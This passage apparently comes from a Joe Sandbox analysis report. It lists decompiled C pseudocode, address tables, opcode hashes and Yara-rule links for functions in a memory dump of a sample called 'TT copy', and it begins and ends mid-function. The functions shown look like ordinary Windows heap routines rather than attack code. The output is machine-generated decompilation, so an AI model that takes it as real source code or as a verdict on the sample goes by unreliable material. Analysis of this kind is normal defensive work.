						E01094F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E01094E70(0x11586b0, 0x1095690, 0, 0) != 0) {
					_t46 = E0106CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                                                                            0x01094d3b
                                                                                                            0x01094d4d
                                                                                                            0x01094d53
                                                                                                            0x01094d58
                                                                                                            0x01094d65
                                                                                                            0x01094d6c
                                                                                                            0x01094d71
                                                                                                            0x01094d77
                                                                                                            0x01094d7f
                                                                                                            0x01094d8c
                                                                                                            0x01094d8e
                                                                                                            0x01094dad
                                                                                                            0x01094db0
                                                                                                            0x01094db7
                                                                                                            0x01094db8
                                                                                                            0x01094db9
                                                                                                            0x01094dba
                                                                                                            0x01094dbb
                                                                                                            0x01094dc1
                                                                                                            0x01094dc8
                                                                                                            0x01094dcc
                                                                                                            0x01094dd5
                                                                                                            0x01094dde
                                                                                                            0x01094ddf
                                                                                                            0x01094de0
                                                                                                            0x01094de1
                                                                                                            0x01094de6
                                                                                                            0x01094de7
                                                                                                            0x01094de9
                                                                                                            0x01094df3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d6c7c
                                                                                                            0x010d6c8a
                                                                                                            0x010d6c8a
                                                                                                            0x010d6c9d
                                                                                                            0x010d6ca7
                                                                                                            0x010d6cac
                                                                                                            0x010d6cb2
                                                                                                            0x010d6cb9
                                                                                                            0x00000000
                                                                                                            0x010d6cbf
                                                                                                            0x010d6cbf
                                                                                                            0x00000000
                                                                                                            0x010d6cbf
                                                                                                            0x010d6cb9
                                                                                                            0x01094dfb
                                                                                                            0x010d6ccf
                                                                                                            0x010d6cd3
                                                                                                            0x01094e32
                                                                                                            0x01094e39
                                                                                                            0x010d6ce0
                                                                                                            0x010d6cf2
                                                                                                            0x010d6cf2
                                                                                                            0x010d6ce0
                                                                                                            0x01094e3f
                                                                                                            0x01094e41
                                                                                                            0x01094e51
                                                                                                            0x01094e51
                                                                                                            0x01094e03
                                                                                                            0x01094e03
                                                                                                            0x01094e09
                                                                                                            0x01094e0f
                                                                                                            0x01094e57
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01094e1b
                                                                                                            0x01094e30
                                                                                                            0x01094e5b
                                                                                                            0x01094e5b
                                                                                                            0x00000000
                                                                                                            0x01094e30
                                                                                                            0x01094e11
                                                                                                            0x01094e11
                                                                                                            0x01094e16
                                                                                                            0x00000000
                                                                                                            0x01094e16
                                                                                                            0x01094e01
                                                                                                            0x00000000
                                                                                                            0x01094e01
                                                                                                            0x01094da5
                                                                                                            0x010d6c6b
                                                                                                            0x00000000
                                                                                                            0x01094dab
                                                                                                            0x01094dab
                                                                                                            0x00000000
                                                                                                            0x01094dab

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 50942775cdce3a912953a7a22d7c3fc769552ab4eba76548f70616aec51aeea9
                                                                                                            • Instruction ID: 6c2045a8db88f5c8c6ec316a96d8b4dbb439737874edde4f60fb433fbf16545f
                                                                                                            • Opcode Fuzzy Hash: 50942775cdce3a912953a7a22d7c3fc769552ab4eba76548f70616aec51aeea9
                                                                                                            • Instruction Fuzzy Hash: BB41BF71A443189FEF62DF18CD90FAAB7A9EB14710F0040AAE985DB281DB70DD85CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0112AA16 Relevance: .1, Instructions: 120COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0112AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0112ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0112AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0112AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0110CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L010877F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E01087D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0112131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0110CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                                                                                            0x0112aa1f
                                                                                                            0x0112aa21
                                                                                                            0x0112aa23
                                                                                                            0x0112aa2b
                                                                                                            0x0112aa30
                                                                                                            0x0112aa36
                                                                                                            0x0112aa39
                                                                                                            0x0112aa42
                                                                                                            0x0112aa75
                                                                                                            0x0112aa7a
                                                                                                            0x0112aa7c
                                                                                                            0x0112aa7c
                                                                                                            0x0112aa88
                                                                                                            0x0112aa8a
                                                                                                            0x0112aa8f
                                                                                                            0x0112ab02
                                                                                                            0x0112ab04
                                                                                                            0x0112aa99
                                                                                                            0x0112aaa8
                                                                                                            0x0112aaaf
                                                                                                            0x0112aab3
                                                                                                            0x0112aacc
                                                                                                            0x0112aad1
                                                                                                            0x0112aad6
                                                                                                            0x0112aae0
                                                                                                            0x0112aaf3
                                                                                                            0x0112aaf9
                                                                                                            0x0112aafe
                                                                                                            0x0112aafe
                                                                                                            0x0112aaf3
                                                                                                            0x0112aad6
                                                                                                            0x0112aab3
                                                                                                            0x0112ab07
                                                                                                            0x0112ab0a
                                                                                                            0x0112ab11
                                                                                                            0x0112ab23
                                                                                                            0x0112ab13
                                                                                                            0x0112ab1c
                                                                                                            0x0112ab1c
                                                                                                            0x0112ab2b
                                                                                                            0x0112ab44
                                                                                                            0x0112ab44
                                                                                                            0x0112ab51
                                                                                                            0x0112ab51
                                                                                                            0x0112aa44
                                                                                                            0x0112aa47
                                                                                                            0x0112aa4c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0112aa5a
                                                                                                            0x0112aa64
                                                                                                            0x0112aa72
                                                                                                            0x00000000
                                                                                                            0x0112aa66
                                                                                                            0x0112aa66
                                                                                                            0x0112aa68
                                                                                                            0x0112aa6a
                                                                                                            0x00000000
                                                                                                            0x0112aa6a

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                                            • Instruction ID: 7df3afecacc439f36f65c450b40cd05393a30260dd3e91f466c6c18748f057fd
                                                                                                            • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                                            • Instruction Fuzzy Hash: C4312232F00225ABEB1D9B69DC44BBFFBBBEF84210F058469E801A7A81DB70CD10C650
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01078A0A Relevance: .1, Instructions: 120COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E01078A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x115d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E010AB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0107E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1041180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E01091DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E010A3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E01078999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                                                                            0x01078a0a
                                                                                                            0x01078a1c
                                                                                                            0x01078a23
                                                                                                            0x01078a2e
                                                                                                            0x01078a30
                                                                                                            0x01078a36
                                                                                                            0x01078a3c
                                                                                                            0x01078a3e
                                                                                                            0x01078a4a
                                                                                                            0x01078a52
                                                                                                            0x01078a9c
                                                                                                            0x01078aae
                                                                                                            0x01078a58
                                                                                                            0x01078a5e
                                                                                                            0x01078a6a
                                                                                                            0x01078a6f
                                                                                                            0x01078a75
                                                                                                            0x01078a7d
                                                                                                            0x01078a85
                                                                                                            0x01078a86
                                                                                                            0x01078a89
                                                                                                            0x01078a93
                                                                                                            0x01078a99
                                                                                                            0x01078a9b
                                                                                                            0x00000000
                                                                                                            0x01078aaf
                                                                                                            0x01078abe
                                                                                                            0x01078ac3
                                                                                                            0x01078acb
                                                                                                            0x01078ad7
                                                                                                            0x01078ae0
                                                                                                            0x01078af1
                                                                                                            0x00000000
                                                                                                            0x01078af1
                                                                                                            0x01078acd
                                                                                                            0x01078ad5
                                                                                                            0x01078afb
                                                                                                            0x01078afd
                                                                                                            0x01078aff
                                                                                                            0x01078b07
                                                                                                            0x01078b22
                                                                                                            0x01078b24
                                                                                                            0x01078b2a
                                                                                                            0x01078b2e
                                                                                                            0x01078b3f
                                                                                                            0x01078b78
                                                                                                            0x01078b41
                                                                                                            0x01078b52
                                                                                                            0x01078b54
                                                                                                            0x01078b5c
                                                                                                            0x01078b74
                                                                                                            0x01078b74
                                                                                                            0x01078b5c
                                                                                                            0x01078b3f
                                                                                                            0x01078b5e
                                                                                                            0x01078b61
                                                                                                            0x01078b64
                                                                                                            0x01078b64
                                                                                                            0x01078b6c
                                                                                                            0x01078b6c
                                                                                                            0x01078b11
                                                                                                            0x010c9cd5
                                                                                                            0x010c9cd5
                                                                                                            0x01078b17
                                                                                                            0x01078b1a
                                                                                                            0x01078b1a
                                                                                                            0x00000000
                                                                                                            0x01078ad5
                                                                                                            0x01078a89

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 14c82226e13c1ae8482c64686e69e8e86be988d27b7136d2a6473c05412b5dd1
                                                                                                            • Instruction ID: b34175a20fea16bccf51b8bad95f25aa12af78bde0009e119a443e305323fc9a
                                                                                                            • Opcode Fuzzy Hash: 14c82226e13c1ae8482c64686e69e8e86be988d27b7136d2a6473c05412b5dd1
                                                                                                            • Instruction Fuzzy Hash: 65416FB0E0022D9BDB64DF59C88CAF9B7F4EB54300F1081EAD95997252E7709E80CF64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0112FDE2 Relevance: .1, Instructions: 116COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 76%
                                                                                                            			E0112FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0112FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E01130A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E01087D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E01121608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E01132B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0112C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0112DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E01087D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0112A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                                                                            0x0112fde7
                                                                                                            0x0112fde8
                                                                                                            0x0112fdec
                                                                                                            0x0112fdee
                                                                                                            0x0112fdf5
                                                                                                            0x0112fdf7
                                                                                                            0x0112fdfc
                                                                                                            0x0112fe19
                                                                                                            0x0112fe22
                                                                                                            0x0112fe26
                                                                                                            0x0112fec6
                                                                                                            0x0112fecd
                                                                                                            0x0112fed5
                                                                                                            0x0112fee7
                                                                                                            0x0112fed7
                                                                                                            0x0112fee0
                                                                                                            0x0112fee0
                                                                                                            0x0112feef
                                                                                                            0x0112ff00
                                                                                                            0x0112ff02
                                                                                                            0x0112ff07
                                                                                                            0x0112ff07
                                                                                                            0x00000000
                                                                                                            0x0112feef
                                                                                                            0x0112fe33
                                                                                                            0x0112fe55
                                                                                                            0x0112fe59
                                                                                                            0x0112fe5b
                                                                                                            0x0112fe5e
                                                                                                            0x0112fe69
                                                                                                            0x0112fe6d
                                                                                                            0x0112fe6d
                                                                                                            0x0112fe69
                                                                                                            0x0112fe35
                                                                                                            0x0112fe41
                                                                                                            0x0112fe41
                                                                                                            0x0112fe79
                                                                                                            0x0112fe8b
                                                                                                            0x0112fe7b
                                                                                                            0x0112fe84
                                                                                                            0x0112fe84
                                                                                                            0x0112fe93
                                                                                                            0x00000000
                                                                                                            0x0112fea8
                                                                                                            0x0112feba
                                                                                                            0x00000000
                                                                                                            0x0112feba
                                                                                                            0x0112fdfe
                                                                                                            0x0112fe01
                                                                                                            0x0112fe02
                                                                                                            0x0112fe08
                                                                                                            0x0112ff0c
                                                                                                            0x0112ff14
                                                                                                            0x0112ff14

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                            • Instruction ID: 714aeccd982e6cf7d651a50b753651daf7edd44c9041f9e577fb10df4f5a9c3d
                                                                                                            • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                            • Instruction Fuzzy Hash: 48312632300662AFD32E9B6CC844F6BBBF9EBC5A50F194058E5468B346DB74DC62C761
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0112EA55 Relevance: .1, Instructions: 111COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 70%
                                                                                                            			E0112EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E01082280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0112E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E0106F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E0107FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0112AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0112BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E01087D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0111FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E0107FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0112A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                                                                                            0x0112ea55
                                                                                                            0x0112ea66
                                                                                                            0x0112ea68
                                                                                                            0x0112ea6c
                                                                                                            0x0112ea6f
                                                                                                            0x0112ea72
                                                                                                            0x0112ea75
                                                                                                            0x0112ea7a
                                                                                                            0x0112ea7a
                                                                                                            0x0112ea7e
                                                                                                            0x0112ea80
                                                                                                            0x0112ea85
                                                                                                            0x0112ea8b
                                                                                                            0x0112eab5
                                                                                                            0x0112eabc
                                                                                                            0x0112eabf
                                                                                                            0x0112eabf
                                                                                                            0x0112eaca
                                                                                                            0x0112eace
                                                                                                            0x0112ead0
                                                                                                            0x0112eae4
                                                                                                            0x0112eaeb
                                                                                                            0x0112eaf0
                                                                                                            0x0112eaf5
                                                                                                            0x0112eb09
                                                                                                            0x0112eb0d
                                                                                                            0x0112eb1d
                                                                                                            0x0112eb2d
                                                                                                            0x0112eb38
                                                                                                            0x0112eb3d
                                                                                                            0x0112eb41
                                                                                                            0x0112eb4a
                                                                                                            0x0112eb60
                                                                                                            0x0112eb4c
                                                                                                            0x0112eb52
                                                                                                            0x0112eb59
                                                                                                            0x0112eb59
                                                                                                            0x0112eb68
                                                                                                            0x0112eb71
                                                                                                            0x0112eb71
                                                                                                            0x0112ea8d
                                                                                                            0x0112ea8f
                                                                                                            0x0112ea92
                                                                                                            0x0112ea97
                                                                                                            0x0112ea97
                                                                                                            0x0112ea9b
                                                                                                            0x0112ea9c
                                                                                                            0x0112ea9e
                                                                                                            0x0112eaa6
                                                                                                            0x0112eaa6
                                                                                                            0x0112eb7e

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                            • Instruction ID: 83efcc136167e6eaf2589c5ec57b45630f673d65a4db1bf679d51556196f5477
                                                                                                            • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                            • Instruction Fuzzy Hash: 0A31B272605716ABC71DDF28C880A6BB7A9FFD0210F04492DF59687645EF30E815CBA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010E69A6 Relevance: .1, Instructions: 108COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 69%
                                                                                                            			E010E69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x115d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L01076C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E010E6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E010A9980() >= 0) {
							E01082280(_t56, 0x1158778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1158774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1158774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0106B6F0(0x104c338, 0x104c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E010A9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E010A95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0107FFB0(_t68, _t77, 0x1158778);
				}
				_pop(_t78);
				return E010AB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                                                                            0x010e69b5
                                                                                                            0x010e69be
                                                                                                            0x010e69c3
                                                                                                            0x010e69c9
                                                                                                            0x010e69cc
                                                                                                            0x010e69d1
                                                                                                            0x010e69d3
                                                                                                            0x010e69de
                                                                                                            0x010e69e1
                                                                                                            0x010e69ea
                                                                                                            0x010e69f6
                                                                                                            0x010e69fe
                                                                                                            0x010e6a13
                                                                                                            0x010e6a14
                                                                                                            0x010e6a15
                                                                                                            0x010e6a16
                                                                                                            0x010e6a1e
                                                                                                            0x010e6a26
                                                                                                            0x010e6a31
                                                                                                            0x010e6a36
                                                                                                            0x010e6a37
                                                                                                            0x010e6a40
                                                                                                            0x010e6a49
                                                                                                            0x010e6a4a
                                                                                                            0x010e6a53
                                                                                                            0x010e6a59
                                                                                                            0x010e6a5d
                                                                                                            0x010e6a5e
                                                                                                            0x010e6a64
                                                                                                            0x010e6a67
                                                                                                            0x010e6a6a
                                                                                                            0x010e6a6d
                                                                                                            0x010e6a70
                                                                                                            0x010e6a77
                                                                                                            0x010e6a7d
                                                                                                            0x010e6a86
                                                                                                            0x010e6a89
                                                                                                            0x010e6a9c
                                                                                                            0x010e6a9f
                                                                                                            0x010e6aa2
                                                                                                            0x010e6aa5
                                                                                                            0x010e6aaf
                                                                                                            0x010e6ab1
                                                                                                            0x010e6ab8
                                                                                                            0x010e6ab9
                                                                                                            0x010e6abb
                                                                                                            0x010e6abe
                                                                                                            0x010e6ac5
                                                                                                            0x010e6ac5
                                                                                                            0x010e6aaf
                                                                                                            0x010e6a40
                                                                                                            0x010e6a26
                                                                                                            0x010e69fe
                                                                                                            0x010e6ace
                                                                                                            0x010e6ad0
                                                                                                            0x010e6ad3
                                                                                                            0x010e6ad8
                                                                                                            0x010e6adf
                                                                                                            0x010e6adf
                                                                                                            0x010e6ae8
                                                                                                            0x010e6aef
                                                                                                            0x010e6aef
                                                                                                            0x010e6af9
                                                                                                            0x010e6b06

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f0e63c3b7bccf8ff3cea6976c8a36bf4ffd5488a714bb4fd82d40962bf7e4427
                                                                                                            • Instruction ID: ed521c5dabf7384d2727a88414b5c6127d6f535ab8c41fce1fe0ae8483658c0c
                                                                                                            • Opcode Fuzzy Hash: f0e63c3b7bccf8ff3cea6976c8a36bf4ffd5488a714bb4fd82d40962bf7e4427
                                                                                                            • Instruction Fuzzy Hash: 42417DB1D00209AFDB24DFAAD940BFEBBF4EF58714F18816AE994A7240DB719905CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01065210 Relevance: .1, Instructions: 107COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 85%
                                                                                                            			E01065210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
